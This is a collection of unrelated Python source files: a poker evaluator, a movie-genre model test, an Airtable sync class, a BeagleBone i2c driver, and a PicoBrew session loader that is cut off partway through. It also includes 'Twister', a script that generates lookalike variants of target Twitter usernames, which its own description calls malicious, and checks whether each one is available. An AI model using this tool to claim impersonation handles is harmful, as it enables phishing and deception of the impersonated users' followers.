fmess = torch.tensor(fmess, dtype=torch.float)
agraph = create_pad_tensor(agraph)
bgraph = create_pad_tensor(bgraph)
graph_tensors = (fnode, fmess, agraph, bgraph, None)
return graph_tensors, scope
|
<reponame>mh0x/twister
#!/usr/bin/env python3
# Twister v0.9
# https://github.com/mh0x/twister
import argparse
import collections
import concurrent.futures
import copy
import itertools
import json
import os
import re
import requests
import sys
__version__ = '0.9'
__author__ = 'https://github.com/mh0x'
script_name = 'Twister v' + __version__ + ' (' + __author__ + '/twister)'
script_desc = '''
Permutation engine for generating and checking the availability of malicious
Twitter usernames. Several edit operations are supported: substitution,
transposition, insertion, deletion, and prefix/suffix.
'''
script_usage = '''twister.py [-h] [-c] [-q] [-o OUTPUT] [-n THREADS]
[-r RETRIES] [-t TIMEOUT] profile user [user ...]'''
script_epilog = '''
edit operations: notation:
{"sub": {x: [y, ...], ...}, "max": n} x, y characters
{"tra": [[x, y], ...], "max": n} u strings
{"ins": {x: [y, ...], ...}, "max": n} n positive integers
{"del": [x, ...], "max": n}
{"pre": [u, ...]}
{"suf": [u, ...]}'''
default_threads = 5
default_retries = 2
default_timeout = 10
valid_chars = re.compile('^[a-zA-Z0-9_]+$')
endpoint_url = 'https://twitter.com/users/username_available?username='
def error(err):
print('[!] error: ' + str(err), file=sys.stderr)
def info(msg, quiet=False):
if not quiet:
print('[*] ' + msg)
def success(msg, quiet=False):
if not quiet:
print('[+] ' + msg)
def failure(msg, quiet=False):
if not quiet:
print('[-] ' + msg)
def prologue(quiet=False):
if not quiet:
print(script_name)
def unique(elems):
return list(collections.OrderedDict.fromkeys(elems))
class EditOp:
def __init__(self, cases, max=1):
self.cases = cases
self.max = max
def apply(self, string):
strs = []
edits = self.edits(string)
for i in range(self.max):
for edit in [[*e] for e in itertools.combinations(edits, i+1)]:
strs.extend(self.generate(string, edit))
return strs
class SubOp(EditOp):
def generate(self, string, edit):
strs = []
for ed in itertools.product(*[e[1] for e in edit]):
chars = list(string)
for i, char in enumerate(ed):
chars[edit[i][0]] = char
strs.append(''.join(chars))
return strs
def edits(self, string):
return [(i, self.cases[c]) for i, c in enumerate(string)
if c in self.cases]
class TraOp(EditOp):
def generate(self, string, edit):
chars = list(string)
for i in edit:
char = chars[i]
chars[i] = chars[i+1]
chars[i+1] = char
return [''.join(chars)]
def edits(self, string):
return [i for i in range(len(string)-1)
if [string[i], string[i+1]] in self.cases]
class InsOp(EditOp):
def generate(self, string, edit):
strs = []
for ed in itertools.product(*[e[1] for e in edit]):
chars = list(string)
for i, char in enumerate(ed):
chars[edit[i][0]] += char
chars = ''.join(chars)
if len(chars) <= 15:
strs.append(chars)
return strs
def edits(self, string):
return [(i, self.cases[c]) for i, c in enumerate(string)
if c in self.cases]
class DelOp(EditOp):
def generate(self, string, edit):
chars = [c for i, c in enumerate(string) if i not in edit]
return [''.join(chars)] if chars else []
def edits(self, string):
return [i for i, c in enumerate(string) if c in self.cases]
class PreOp(EditOp):
def apply(self, string):
strings = []
for string1 in self.cases:
string2 = string1 + string
if len(string2) <= 15:
strings.append(string2)
return strings
class SufOp(EditOp):
def apply(self, string):
strings = []
for string1 in self.cases:
string2 = string + string1
if len(string2) <= 15:
strings.append(string2)
return strings
class ArgParser(argparse.ArgumentParser):
def format_help(self):
formatter = self._get_formatter()
formatter.add_text(script_name)
formatter.add_text(self.description)
formatter.add_usage(self.usage, self._actions,
self._mutually_exclusive_groups)
for action_group in self._action_groups:
formatter.start_section(action_group.title)
formatter.add_text(action_group.description)
formatter.add_arguments(action_group._group_actions)
formatter.end_section()
formatter.add_text(self.epilog)
return formatter.format_help()
def error(self, msg):
raise argparse.ArgumentTypeError(msg.replace('\'', '') + os.linesep*2 +
self.format_usage().rstrip())
def help_formatter(prog):
return argparse.RawTextHelpFormatter(prog, max_help_position=40)
def arg_default(default):
return '(default: ' + str(default) + ')'
def arg_error(obj, desc, msg=''):
raise argparse.ArgumentTypeError(
'invalid ' + desc + ': ' + str(obj).replace('\'', '"')
+ (' (' + msg + ')' if msg else ''))
def check_type(obj, typ, desc, msg=''):
if not isinstance(obj, typ):
arg_error(obj, desc, msg)
def check_list(obj, desc):
check_type(obj, list, desc, 'expected an array')
def check_dict(obj, desc):
check_type(obj, dict, desc, 'expected an object')
def parse_str(obj, desc, min=1, max=15):
check_type(obj, str, desc, 'expected a string')
if min == max and len(obj) != min:
arg_error(obj, desc, 'expected ' + str(min) + ' chars'
+ ('' if min == 1 else 's'))
if len(obj) < min:
arg_error(obj, desc, 'min length is ' + str(min))
if len(obj) > max:
arg_error(obj, desc, 'max length is ' + str(max))
if not valid_chars.match(obj):
arg_error(obj, desc, 'valid chars: a-z, A-Z, 0-9, _')
return obj.lower()
def parse_str_set(obj, desc, min=1, max=15):
check_list(obj, desc + ' set')
return unique([parse_str(o, desc, min, max) for o in obj])
def parse_char(obj):
return parse_str(obj, 'char', max=1)
def parse_char_set(obj):
return parse_str_set(obj, 'char', max=1)
def parse_int(obj):
try:
num = int(obj)
except ValueError:
arg_error(obj, 'int value')
return num
def parse_nneg_int(obj):
num = parse_int(obj)
if num < 0:
arg_error(num, 'int value', 'must be non-negative')
return num
def parse_pos_int(obj):
num = parse_int(obj)
if num < 1:
arg_error(num, 'int value', 'must be positive')
return num
def parse_op(obj, key, max=True):
op = {}
for k in obj:
if k == key or (max and k == 'max'):
op[k] = copy.copy(obj[k])
else:
arg_error(k, 'operation property')
if max and 'max' not in op:
arg_error(obj, 'operation', 'missing max property')
return op
def parse_sub_op(obj):
op = parse_op(obj, 'sub')
check_dict(op['sub'], 'operation property')
subs = {}
for string, obj in op['sub'].items():
char = parse_char(string)
chars = [c for c in parse_char_set(obj) if c != char]
if chars:
subs[char] = chars
return SubOp(subs, parse_pos_int(op['max']))
def parse_tra_op(obj):
op = parse_op(obj, 'tra')
check_list(op['tra'], 'operation property')
tras = []
for obj in op['tra']:
chars = parse_char_set(obj)
if len(chars) != 2:
arg_error(chars, 'operation property', 'expected two charaters')
if chars not in tras:
tras.append(chars)
return TraOp(tras, parse_pos_int(op['max']))
def parse_ins_op(obj):
op = parse_op(obj, 'ins')
check_dict(op['ins'], 'operation property')
ins = {parse_char(s): parse_char_set(o) for s, o in op['ins'].items()}
return InsOp(ins, parse_pos_int(op['max']))
def parse_del_op(obj):
op = parse_op(obj, 'del')
return DelOp(parse_char_set(obj['del']), parse_pos_int(op['max']))
def parse_pre_op(obj):
return PreOp(parse_str_set(
parse_op(obj, 'pre', False)['pre'], 'prefix', max=14))
def parse_suf_op(obj):
return SufOp(parse_str_set(
parse_op(obj, 'suf', False)['suf'], 'suffix', max=14))
op_parsers = {'sub': parse_sub_op, 'tra': parse_tra_op,
'ins': parse_ins_op, 'del': parse_del_op,
'pre': parse_pre_op, 'suf': parse_suf_op}
def parse_profile(string):
try:
if os.path.isfile(string):
with open(string, 'r') as fp:
obj = json.load(fp)
else:
obj = json.loads(string)
except (IOError, json.JSONDecodeError) as err:
raise argparse.ArgumentTypeError(str(err))
check_list(obj, 'profile')
profile = []
for obj1 in obj:
check_dict(obj1, 'operation')
keys = [k for k in obj1 if k in op_parsers]
if len(keys) == 1:
profile.append(op_parsers[keys[0]](obj1))
elif keys:
arg_error(obj1, 'operation', 'ambiguous properties')
else:
arg_error(obj1, 'operation')
return profile
def parse_user(string):
if string and string[0] == '@':
string = string[1:]
return parse_str(string, 'username')
def parse_args():
parser = ArgParser(description=script_desc, usage=script_usage,
epilog=script_epilog, formatter_class=help_formatter)
parser.add_argument('profile', type=parse_profile,
help='generator profile json')
parser.add_argument('user', type=parse_user, nargs='+',
help='target username(s)')
parser.add_argument('-c', '--check', action='store_true',
help='check availability of generated usernames')
parser.add_argument('-q', '--quiet', action='store_true',
help='suppress messages sent to stdout')
parser.add_argument('-o', '--output', type=argparse.FileType('w'),
help='output results to csv file')
parser.add_argument('-n', '--threads', type=parse_pos_int,
default=default_threads,
help=('max concurrent requests '
+ arg_default(default_threads)))
parser.add_argument('-r', '--retries', type=parse_nneg_int,
default=default_retries,
help=('max request retries '
+ arg_default(default_retries)))
parser.add_argument('-t', '--timeout', type=parse_pos_int,
default=default_timeout,
help=('request timeout, secs '
+ arg_default(default_timeout)))
try:
args = parser.parse_args()
args.user = unique(args.user)
return args
except argparse.ArgumentTypeError as err:
prologue()
print()
error(err)
sys.exit(1)
def generate_users(target, profile, quiet=False):
users = [target]
for op in profile:
temp = []
for user in users:
for user1 in op.apply(user):
if user1 not in set(users + temp):
temp.append(user1)
success(user1, quiet)
users.extend(temp)
users.remove(target)
return users
def generate_all(targets, profile, quiet=False):
info('generating usernames ...', quiet)
users = []
for target in targets:
users.extend(generate_users(target, profile, quiet))
total = len(users)
info('generated ' + str(total) + ' username'
+ ('' if total == 1 else 's'), quiet)
return users
def user_available(user, session, timeout=default_timeout, quiet=False):
try:
resp = session.get(endpoint_url + user, timeout=timeout).json()
if 'valid' in resp:
return resp['valid']
error('malformed response: ' + str(resp))
except (requests.exceptions.RequestException, json.JSONDecodeError) as err:
error(err)
def check_available(users, threads=default_threads, retries=default_retries,
timeout=default_timeout, quiet=False):
info('checking availability ...', quiet)
hits = 0
errs = 0
checked = 0
results = []
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as pool:
with requests.session() as session:
session.mount('https://twitter.com',
requests.adapters.HTTPAdapter(max_retries=retries))
futures = {pool.submit(user_available, user, session,
timeout, quiet): user for user in users}
try:
for future in concurrent.futures.as_completed(futures):
user = futures[future]
available = future.result()
if available:
hits += 1
success(user + ' is available', quiet)
results.append(user + ',1')
elif available is not None:
failure(user + ' is unavailable', quiet)
results.append(user + ',0')
else:
errs += 1
results.append(user + ',-1')
checked += 1
except KeyboardInterrupt:
print(' stopping ...')
for future in futures:
future.cancel()
total = len(users)
msg = (str(hits) + ' out of ' + str(total) + ' username'
+ (' is' if total == 1 else 's are') + ' available')
caveat = []
if checked != total:
caveat.append('stopped after ' + str(checked) + ' check'
+ ('' if checked == 1 else 's'))
if errs:
caveat.append('with ' + str(errs) + ' error'
+ ('' if errs == 1 else 's'))
info(msg + (' (' + ' '.join(caveat) + ')' if caveat else ''), quiet)
return results
def write_csv(lines, outfile, quiet=False):
info('outputing results ...', quiet)
outfile.write(os.linesep.join(lines))
def main():
args = parse_args()
prologue(args.quiet)
users = generate_all(args.user, args.profile, args.quiet)
if args.check and len(users) > 0:
users = check_available(users, args.threads, args.retries,
args.timeout, args.quiet)
if args.output:
write_csv(users, args.output, args.quiet)
args.output.close()
info('done', args.quiet)
if __name__ == '__main__':
main()
|
from itertools import combinations as combinations
from operator import attrgetter
import Player as P
###
class PokerPool(P.Player):
'''Derived class for pool of common cards'''
max_cards = 5
def __init__(self, name):
P.Player.__init__(self, name)
self.hand.max_cards = self.max_cards
###
class PokerHand():
'''Class for finding best hand with pool'''
max_cards = 5
#_____________________________
def __init__(self, hand, pool):
self.hand = hand.cards
self.pool = pool.cards
self.score = 0
#_____________________________
def is_tie(self, score, rank_cards, kicker_cards):
'''
Returns true if score is same, rank cards are identical,
and kicker cards are identical
'''
if score != self.score:
return False
if rank_cards != self.rank_cards:
return False
if kicker_cards != self.kicker_cards:
return False
return True
#_______________________
def is_better(self, score, rank_cards, kicker_cards):
'''Returns true if input score, rank, kicker
is better than current hand
'''
if score > self.score:
return True
elif score == self.score:
# Better rank of hand (e.g. KK vs QQ) FIXME be careful about two or more rank cards, order
if rank_cards > self.rank_cards:
return True
# Better kickers (e.g. KK, Ace High vs KK, J high)
elif rank_cards == self.rank_cards and kicker_cards > self.kicker_cards:
return True
# Current hand is better
return False
#__________________
def get_score(self):
my_poker = Poker()
card_pool = self.hand + self.pool
hands = list(combinations(card_pool, self.max_cards))
for h in hands:
i_s, i_rc, i_kc = my_poker.eval_hand(h)
if self.is_better(i_s, i_rc, i_kc):
self.update_hand(i_s, h, i_rc, i_kc)
#_______________________________
def update_hand(self, s, fh, rc, kc):
self.score = s
self.rank_cards = rc
self.kicker_cards = kc
final_hand = P.Hand()
for c in fh:
final_hand.add_card(c)
self.final_hand = final_hand
###
class Poker:
'''Class to evaluate Poker hand'''
def __init__(self):
v = []
s = []
pass
def values(self, cards):
'''Returns sorted values'''
#return sorted([c.value for c in cards], reverse=True)
return [c.value for c in cards]
def suits(self, cards):
'''Returns suits'''
return [c.suit for c in cards]
def n_kind(self, n, values):
'''Returns n-of-a-kind value if exists'''
return set( v for v in values if values.count(v) >= n)
def is_straight(self, values):
'''Returns straight, and ace-low'''
ace_low = len(set(values)) == 5 and values[0]-values[-1] == 12 and values[1] ==5
straight = (len(set(values)) == 5 and values[0]-values[-1] == 4) or ace_low
return straight, ace_low
def is_flush(self, suits):
'''Returns true if all same suit'''
return len(set(suits)) == 1
#______________________________________
def straight_flush(self, cards, rc, kc):
st, al = self.is_straight(self.v)
fl = self.is_flush(self.s)
# Royal Flush
if st and fl:
if self.v[-1] == 10:
sc = 10
#vAce-low straight flush
elif al and fl:
sc = 9
rc.add_card(cards[1])
# Other straight flush
elif st and fl:
sc = 9
rc.add_card(cards[0])
return sc, rc, kc
return False
#______________________________________
def four_of_a_kind(self, cards, rc, kc):
if self.k_4:
sc = 8
for c in cards:
if c.value in self.k_4: rc.add_card(c)
else: kc.add_card(c)
return sc, rc, kc
return False
#__________________________________
def full_house(self, cards, rc, kc):
if self.k_3 and self.k_2 and len(self.k_2-self.k_3) > 0:
sc = 7
for c in cards:
if c.value in self.k_3: rc.add_card(c)
for c in cards:
if c.value in (self.k_2 - self.k_3): rc.add_card(c)
return sc, rc, kc
return False
#______________________________
def flush(self, cards, rc, kc):
if self.is_flush(self.s):
sc = 6
for c in cards:
rc.add_card(c)
return sc, rc, kc
return False
#________________________________
def straight(self, cards, rc, kc):
st, al = self.is_straight(self.v)
if st:
sc = 5
rc.add_card(cards[1]) if al else rc.add_card(cards[0])
return sc, rc, kc
return False
#_______________________________________
def three_of_a_kind(self, cards, rc, kc):
if self.k_3:
sc = 4
for c in cards:
if c.value in self.k_3: rc.add_card(c)
else: kc.add_card(c)
return sc, rc, kc
return False
#________________________________
def pair(self, cards, rc, kc):
# Two pair
if len(self.k_2) > 1:
sc = 3
for c in cards:
if c.value == max(self.k_2): rc.add_card(c)
elif c.value not in self.k_2: kc.add_card(c)
for c in cards:
if c.value == min(self.k_2): rc.add_card(c)
# Pair
elif self.k_2:
sc = 2
for c in cards:
if c.value in self.k_2: rc.add_card(c)
else: kc.add_card(c)
# High card
else:
sc = 1
for c in cards:
if c.value == self.v[0]: rc.add_card(c)
else: kc.add_card(c)
return sc, rc, kc
#_________________________
def eval_hand(self, cards):
poker_hands = [self.straight_flush,self.four_of_a_kind,self.full_house,
self.flush,self.straight,self.three_of_a_kind,self.pair]
s_cards = sorted(cards, key=attrgetter('value','suits'), reverse=True)
self.v = self.values(s_cards)
self.s = self.suits(s_cards)
self.k_4 = self.n_kind(4, self.v)
self.k_3 = self.n_kind(3, self.v)
self.k_2 = self.n_kind(2, self.v)
rank_cards = P.Hand()
kicker_cards = P.Hand()
for ranker in poker_hands:
rank = ranker(s_cards, rank_cards, kicker_cards)
if rank: break
return rank[0], rank[1], rank[2]
|
'''
Project: Predicting movie genres from movie posters
Course: COMPSCI 682 Neural Networks: A Modern Introduction
File: run_external_test.py
Description: Runs test for an external image from its URL on the internet.
Author: <NAME>
'''
import sys
import operator
import numpy as np
import data_load as dl
from os import listdir
import data_manage as dm
from os.path import isfile, join
from keras.models import load_model
models_path = str(sys.argv[1]) + '/'
eval_models = True
verbose = True
crop = 3
class TransferModel:
'''
TransferModel is an object that stores all saved model properties.
'''
min_year = 0
max_year = 0
genres = []
ratio = 0
epochs = 0
style = 1
file_path = ''
model = None
def eval(self):
'''
Get scores on input data.
'''
print('Loading test data...')
x_test, y_test = dl.load_data(self.min_year, self.max_year, self.genres, self.ratio, set_type='test', verbose=False)
print('Evaluating model...')
scores = self.model.evaluate(x_test, y_test, verbose=0)
print('Test loss =', scores[0])
print('Test accuracy =', scores[1])
def predict(self, movie):
'''
Make a prediction using this model.
'''
x = [movie.img_to_rgb(self.ratio)]
x = np.array(x, dtype='float32')
return self.model.predict(x)
def load(self):
'''
Load the model for testing.
'''
self.model = load_model(self.file_path)
def __str__(self):
return (
'Model v' + str(self.style) \
+ ' (' + str(self.min_year) + '-' + str(self.max_year) \
+ ' / g' + str(len(self.genres)) \
+ ' / r' + str(self.ratio) \
+ ' / e' + str(self.epochs) \
+ ')'
)
def parse_model(file_name):
'''
Parse the model from its name.
'''
split = file_name.split('_')
parsed = TransferModel()
parsed.min_year = int(split[3])
parsed.max_year = int(split[4])
parsed.genres = ['Horror', 'Romance', 'Action', 'Documentary']
parsed.ratio = int(split[6][1:])
parsed.epochs = int(split[7][1:])
parsed.style = int(split[8].split('.')[0][1:])
parsed.file_path = file_name
return parsed
def list_models():
return sorted([f for f in listdir(models_path) if isfile(join(models_path, f)) and f.startswith('genres_')])
def repeat_length(string, length):
return (string * (int(length / len(string)) + 1))[:length]
def format_preds(movie, genres, preds):
'''
Format predictions from multi-hot encoding to human readable structure.
'''
preds_map = {}
for i in range(len(genres)):
preds_map[genres[i]] = preds[0][i]
sorted_preds = sorted(preds_map.items(), key=operator.itemgetter(1), reverse=True)
preds_str = []
for genre, probability in sorted_preds:
if genre in movie.genres:
is_present = ''
else:
is_present = '[!]'
preds_str.append(genre + is_present + ': ' + "{:.0%}".format(probability))
spaces = repeat_length(' ', 33 - len(str(movie)))
if crop is not None:
return str(movie) + spaces + str(preds_str[:crop])
else:
return str(movie) + spaces + str(preds_str)
def main():
'''
Test the external movie using models in the models_path directory.
'''
for model_file in list_models():
saved_model = parse_model(models_path + model_file)
saved_model.load()
print('')
print('------------------------------------------------------------------------')
print(saved_model)
test_movies = {}
test_movies['?'] = [
str(sys.argv[2]),
]
if verbose:
for expected_genre, movies_titles in sorted(test_movies.items()):
for movie_title in movies_titles:
movie = dm.search_movie_external(title=movie_title)
if movie is not None:
preds = saved_model.predict(movie)
print(format_preds(movie, saved_model.genres, preds))
else:
print(movie_title + ' not found')
print('------------------------------------------------------------------------')
if __name__ == '__main__':
main()
|
<filename>app/Populator.py
import posixpath
from typing import Dict, List
from pyairtable import Api, Table
from pyairtable.metadata import get_api_bases
from pyairtable.formulas import match
from Schema import Schema
class Populator:
base_id: str = None
airtable_api: Api = None
base_table: Table = None
users_table: Table = None
workspace_id: str = None
def __init__(self, base_id: str, airtable_api_key: str, workspace_id: str):
self.base_id = base_id
self.airtable_api = Api(api_key=airtable_api_key)
self.base_table = Table(api_key=airtable_api_key, base_id=self.base_id, table_name=Schema.BASES_TABLE_NAME)
self.users_table = Table(api_key=airtable_api_key, base_id=self.base_id, table_name=Schema.USERS_TABLE_NAME)
self.users_to_base_table = Table(api_key=airtable_api_key, base_id=self.base_id,
table_name=Schema.USERSTOBASES_TABLE_NAME)
self.workspace_id = workspace_id
if not self.workspace_id:
raise Exception("Workspace ID is required")
def upsert(self, table: Table, column_name: str, column_value: str, data: Dict):
found = table.all(formula=match({column_name: column_value}))
if found:
table.update(record_id=found[0]['id'], fields=data)
else:
data[column_name] = column_value
table.create(fields=data)
def populate_bases(self):
bases = get_api_bases(self.airtable_api)
for b in bases['bases']:
base_id = b['id']
base_name = b['name']
self.upsert(table=self.base_table, column_name='Id', column_value=base_id, data={'Name': base_name})
def populate(self):
self.populate_bases()
e = self.workspaces(workspace_id=self.workspace_id)
self.populate_workspace_collaborators(collaborators=e['collaborators']['workspaceCollaborators'])
self.populate_base_collaborators(base_collaborators=e['collaborators']['baseCollaborators'])
# TODO finish this method.
return -1
def clear(self):
records = True
while records:
records = self.base_table.all(max_records=1000)
ids = [d['id'] for d in records]
self.base_table.batch_delete(ids)
def workspaces(self, workspace_id):
base_schema_url = posixpath.join(
self.airtable_api.API_URL, "meta", "workspaces", workspace_id
) + "?include=collaborators"
return self.airtable_api._request("get", base_schema_url)
def populate_workspace_collaborators(self, collaborators):
for u in collaborators:
user_id = u['userId']
email = u['email']
permission_level = u['permissionLevel']
self.upsert(table=self.users_table, column_name='Id', column_value=user_id, data={'Email': email,
'Workspace Permissions': permission_level,
'Workspace Grant Date': u[
'createdTime']})
def populate_base_collaborators(self, base_collaborators: List):
for u in base_collaborators:
user_id = u['userId']
email = u['email']
self.upsert(table=self.users_table, column_name='Id', column_value=user_id, data={'Email': email})
base_id = u['baseId']
base = self.base_table.first(formula=match({'Id': base_id}))
if base is None:
print(f"Unable to find base: {base_id}")
base_record_key = base['id']
user = self.users_table.first(formula=match({'Id': user_id}))
if user is None:
print(f"Unable to find user: {user_id}")
user_record_key = user['id']
permission_level = u['permissionLevel']
user_base = f"{user_id}-{base_id}"
self.upsert(table=self.users_to_base_table,
column_name='User Base',
column_value=user_base,
data={'Base': [base_record_key],
'User': [user_record_key],
'Access Type': permission_level
})
|
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Allows creation of i2c interface for beaglebone devices."""
import logging
import subprocess
import bbmux_controller
import common as c
import i2c_base
class BBi2cError(c.InterfaceError):
"""Class for exceptions of BBi2c."""
def __init__(self, msg, value=0):
"""BBi2cError constructor.
Args:
msg: string, message describing error in detail
value: integer, value of error when non-zero status returned. Default=0
"""
super(BBi2cError, self).__init__(msg, value)
self.msg = msg
self.value = value
class BBi2c(i2c_base.BaseI2CBus):
"""Provide interface to i2c through beaglebone"""
def __init__(self, interface):
i2c_base.BaseI2CBus.__init__(self)
self._logger = logging.getLogger('BBi2c')
self._interface = interface
self._bus_num = interface['bus_num']
# Older kernels utilizing the omap mux starts counting from 1
if bbmux_controller.use_omapmux():
self._bus_num += 1
@staticmethod
def Build(interface_data, **kwargs):
"""Factory method to implement the interface."""
return BBi2c(interface=interface_data)
@staticmethod
def name():
"""Name to request interface by in interface config maps."""
return 'bb_i2c'
def _write(self, child, address, wlist):
"""Preform a single i2cset write command.
Args:
child: 7-bit address of the child device.
address: data address we are writing to. Will be written to the i2c bus.
wlist: list of bytes to write to the child. List length must be between
0-2 bytes.
Raises:
BBi2cError: If wlist has more than 3 bytes or the i2cset call fails.
"""
# i2cset can write up to 3 bytes to an i2c device in the format of:
# [1-byte address][0-2 bytes of data]
args = ['i2cset', '-y', str(self._bus_num), '0x%02x' % child, address]
if len(wlist) > 2:
raise BBi2cError('Can only write up to 3 bytes (1-byte register address '
'and 2-byte word) per i2cset command. '
'wlist: %s' % wlist)
# Form the data argument and reverse the bytes due to endianness.
if wlist:
data = '0x' + ''.join('%02x' % wbyte for wbyte in reversed(wlist))
args.append(data)
if len(wlist) == 2:
# Put the command in word mode.
args.append('w')
try:
logging.debug(' '.join(args))
subprocess.check_call(args)
except subprocess.CalledProcessError:
raise BBi2cError('Failed i2c write to child address: %s data: %s' %
(child, wlist))
def _read(self, child, address, rcnt):
"""Read from a child i2c device.
Args:
child: 7-bit address of the child device.
address: data address to read.
rcnt: number of bytes (0-2) to read from the device.
Returns:
list of bytes read from i2c device.
Raises:
BBi2cError: If read (i2cget call) fails or if rcnt > 2.
"""
if not rcnt:
return []
if rcnt > 2:
raise BBi2cError('Can only read up to 2 bytes per i2cget command.')
if rcnt == 2:
return self._read_two_bytes(child, address)
return self._read_one_byte(child)
def _read_one_byte(self, child):
"""Read one byte from a child i2c device.
Args:
child: 7-bit address of the child device.
Returns:
list of bytes read from i2c device.
Raises:
BBi2cError: If read (i2cget call) fails.
"""
read_bytes = []
args = ['i2cget', '-y', str(self._bus_num), '0x%x' % child]
try:
logging.debug(' '.join(args))
read_value = subprocess.check_output(args)
except subprocess.CalledProcessError:
raise BBi2cError('Failed i2c read of 1 byte from child address: %s' \
% child)
read_value_int = int(read_value, 0)
read_bytes.append(read_value_int)
return read_bytes
def _read_two_bytes(self, child, address):
"""Read two byte from a child i2c device.
Args:
child: 7-bit address of the child device.
address: data address to read.
Returns:
list of bytes read from i2c device.
Raises:
BBi2cError: If read (i2cget call) fails.
"""
read_bytes = []
args = ['i2cget', '-y', str(self._bus_num), '0x%x' % child, address, 'w']
try:
logging.debug(' '.join(args))
read_value = subprocess.check_output(args)
except subprocess.CalledProcessError:
raise BBi2cError('Failed i2c read of 2 bytes from child address: %s, '
'data address: %s.' % (child, address))
read_value_int = int(read_value, 0)
# Grab the second byte first (converting little endian to big).
read_bytes.append(read_value_int & 0xff)
# Grab the first byte.
read_bytes.append(read_value_int >> 8)
return read_bytes
def _raw_wr_rd(self, child, wlist, rcnt):
"""Write and/or read a child i2c device.
Args:
child: 7-bit address of the child device
wlist: list of bytes to write to the child. If list length is zero its
just a read.
rcnt: number of bytes (0-2) to read from the device. If zero, its just a
write.
Returns:
list of bytes read from i2c device.
"""
self._logger.debug('wr_rd. child: 0x%x, wlist: %s, rcnt: %s', child, wlist,
rcnt)
address = '0x%02x' % wlist[0]
if wlist:
self._write(child, address, wlist[1:])
return self._read(child, address, rcnt)
def test():
"""Test code. (forked from ftdii2c.py)"""
loglevel = logging.INFO
logging.basicConfig(
level=loglevel,
format='%(asctime)s - %(name)s - ' + '%(levelname)s - %(message)s')
i2c = BBi2c(3)
wbuf = [0]
child = 0x21
rbuf = i2c.wr_rd(child, wbuf, 1)
logging.info('first: i2c read of child=0x%02x reg=0x%02x == 0x%02x', child,
wbuf[0], rbuf[0])
errcnt = 0
for cnt in range(1000):
try:
rbuf = i2c.wr_rd(child, [], 1)
except:
errcnt += 1
logging.error('errs = %d cnt = %d', errcnt, cnt)
logging.info('last: i2c read of child=0x%02x reg=0x%02x == 0x%02x', child,
wbuf[0], rbuf[0])
if __name__ == '__main__':
test()
|
<reponame>metahertz/picobrew_pico
import json
from .config import brew_active_sessions_path
from .model import PicoBrewSession
file_glob_pattern = "[!._]*.json"
active_brew_sessions = {}
active_ferm_sessions = {}
def load_brew_session(file):
info = file.stem.split('#')
# 0 = Date, 1 = UID, 2 = RFID / Session GUID (guid), 3 = Session Name, 4 = Session Type (integer - z only)
name = info[3].replace('_', ' ')
step = ''
with open(file) as fp:
raw_data = fp.read().rstrip()
if raw_data.endswith(','):
# Recover from incomplete session json data file
raw_data = raw_data[:-1] + '\n]'
elif raw_data.endswith('[') or raw_data == '':
# Recover from aborted session data file
raw_data = '[\n]'
json_data = json.loads(raw_data)
chart_id = info[0] + '_' + info[2]
alias = '' if info[1] not in active_brew_sessions else active_brew_sessions[info[1]].alias
session_type = None
if len(info) > 4:
session_type = int(info[4])
session = {
'date': info[0],
'name': name,
'uid': info[1],
'session': info[2],
'is_pico': len(info[1]) == 32,
'type': session_type,
'alias': alias,
'data': json_data,
'graph': get_brew_graph_data(chart_id, name, step, json_data)
}
if len(json_data) > 0 and 'recovery' in json_data[-1]:
session.update({'recovery': json_data[-1]['recovery']})
return (session)
def get_brew_graph_data(chart_id, session_name, session_step, session_data, is_pico=None):
wort_data = [] # Shared
block_data = [] # Pico and ZSeries Only
board_data = [] # Zymatic Only
heat1_data = [] # Zymatic Only
heat2_data = [] # Zymatic Only
target_data = [] # ZSeries Only
drain_data = [] # ZSeries Only
ambient_data = [] # ZSeries Only
valve_position = [] # ZSeries Only
events = []
for data in session_data:
if all(k in data for k in ('therm', 'wort')): # Pico and ZSeries
wort_data.append([data['time'], int(data['wort'])])
block_data.append([data['time'], int(data['therm'])])
if all(k in data for k in ('target', 'drain', 'ambient', 'position')): # ZSeries
target_data.append([data['time'], int(data['target'])])
drain_data.append([data['time'], int(data['drain'])])
ambient_data.append([data['time'], int(data['ambient'])])
# TODO figure out how to add `position`, `pause_state` and `error` to the graphs?
valve_position.append([data['time'], int(data['position'])])
if all(k in data for k in ('wort', 'board', 'heat1', 'heat2')): # Zymatic
wort_data.append([data['time'], int(data['wort'])])
board_data.append([data['time'], int(data['board'])])
heat1_data.append([data['time'], int(data['heat1'])])
heat2_data.append([data['time'], int(data['heat2'])])
# add an overlay event for each step
if 'event' in data:
events.append({'color': 'black', 'width': '2', 'value': data['time'],
'label': {'text': data['event'], 'style': {'color': 'white', 'fontWeight': 'bold'},
'verticalAlign': 'top', 'x': -15, 'y': 0}})
graph_data = {
'chart_id': chart_id,
'title': {'text': session_name},
'subtitle': {'text': session_step},
'xaplotlines': events
}
if len(ambient_data) > 0:
graph_data.update({'series': [
{'name': 'Target', 'data': target_data},
{'name': 'Wort', 'data': wort_data},
{'name': 'Heat Exchanger', 'data': block_data},
{'name': 'Drain', 'data': drain_data},
{'name': 'Ambient', 'data': ambient_data}
]})
elif len(block_data) > 0 or is_pico:
graph_data.update({'series': [
{'name': 'Wort', 'data': wort_data},
{'name': 'Heat Block', 'data': block_data}
]})
else:
graph_data.update({'series': [
{'name': 'Wort', 'data': wort_data},
{'name': 'Heat Loop', 'data': heat1_data},
{'name': 'Board', 'data': board_data},
{'name': 'Heat Loop 2', 'data': heat2_data}
]})
return graph_data
def load_ferm_session(file):
info = file.stem.split('#')
# 0 = Date, 1 = Device UID
with open(file) as fp:
raw_data = fp.read().rstrip()
if raw_data.endswith(','):
# Recover from incomplete json data file
raw_data = raw_data[:-1] + '\n]'
json_data = json.loads(raw_data)
chart_id = info[0] + '_' + info[1]
name = info[1]
if info[1] in active_ferm_sessions:
name = active_ferm_sessions[info[1]].alias
return ({
'date': info[0],
'name': name,
'graph': get_ferm_graph_data(chart_id, None, json_data)
})
def get_ferm_graph_data(chart_id, voltage, session_data):
temp_data = []
pres_data = []
for data in session_data:
temp_data.append([data['time'], float(data['temp'])])
pres_data.append([data['time'], float(data['pres'])])
graph_data = {
'chart_id': chart_id,
'title': {'text': 'Fermentation'},
'series': [
{
'name': 'Temperature',
'data': temp_data
}, {
'name': 'Pressure',
'data': pres_data,
'yAxis': 1
}
],
}
if voltage:
